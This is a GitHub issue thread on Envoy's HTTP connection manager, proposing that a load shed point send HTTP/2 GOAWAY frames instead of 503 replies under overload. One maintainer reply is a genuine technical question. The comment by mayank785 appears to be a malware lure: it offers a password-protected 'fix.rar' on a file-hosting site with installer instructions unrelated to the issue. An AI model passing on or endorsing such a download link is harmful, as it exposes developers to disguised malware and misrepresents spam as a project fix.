### ISSUE TITLE
http_connection_manager_decode_headers to send GOAWAY for H/2

### ISSUE THREAD

**Issue by botengyao** [envoyproxy/envoy#35851]
The current `http_connection_manager_decode_headers` load shed point is sending 503 local reply when Envoy is under overload, one idea is we can send GO_AWAY for H/2 after decoding header. This will benefit the connection rebalance. One risk probably is to process the existing streams, but we can use a shutdown notice following a GO_AWAY.

cc @KBaichoo, WDYT?

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by KBaichoo** [comment]
Can you help me understand why / whether: `envoy.load_shed_points.http2_server_go_away_on_dispatch` doesn't work for your use case?
